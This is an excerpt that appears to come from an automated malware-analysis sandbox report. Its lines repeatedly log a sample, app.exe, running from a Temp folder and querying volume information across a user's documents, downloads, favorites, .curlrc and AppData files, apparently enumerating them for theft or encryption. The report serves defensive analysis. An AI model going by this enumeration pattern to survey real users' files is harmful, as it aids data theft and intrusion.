Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\IVHSHTCODI.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\JDSOXXXWOA VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\JPEAFKFPZY.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\JPEAFKFPZY.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\FACWLRWHGG.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\FACWLRWHGG.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\IVHSHTCODI.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\IVHSHTCODI.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\XQACHMZIHU.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\XQACHMZIHU.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Music VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Music\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Music\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Pictures\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Pictures\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Videos VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Videos\Captures VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Videos\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Videos\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\PSAMNLJHZW VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\XQACHMZIHU.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\XQACHMZIHU.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\autoit-v3-setup.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\autoit-v3-setup.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\eicar.com.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\eicar.com.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\eicar.com.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\FACWLRWHGG.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\FACWLRWHGG.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\IVHSHTCODI.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\IVHSHTCODI.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\JPEAFKFPZY.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\JPEAFKFPZY.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\OfficeSetup.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\OfficeSetup.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\XQACHMZIHU.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\XQACHMZIHU.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Amazon.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Bing.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Bing.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Facebook.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Google.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Links VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Links\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Links\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Live.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\NYTimes.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Reddit.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Reddit.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Wikipedia.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Brighten Video.man.igpi VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Brighten Video.man.igpi VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\BRIGHT~1.IGP VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\BRIGHT~1.IGP VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Darken Video.man.igpi VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Darken Video.man.igpi VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\DARKEN~1.IGP VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\DARKEN~1.IGP VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Enhance Video Colors.man.igpi VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Enhance Video Colors.man.igpi VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\ENHANC~1.IGP VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\ENHANC~1.IGP VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links\Desktop.lnk VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links\Desktop.lnk VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links\Downloads.lnk VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe\Acrobat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe\ARM VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe\Color VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Comms VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ElevatedDiagnostics VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\MicrosoftEdge VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\PeerDistRepub VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Publishers VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\_curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Comms VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Comms\Unistore VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469.cdp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469.cdp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.sst VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.sst VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdpresource VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdpresource VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache\3534848bb9f4cb71 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache\cb00da9ba77862e VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f VolumeInformationJump to behavior
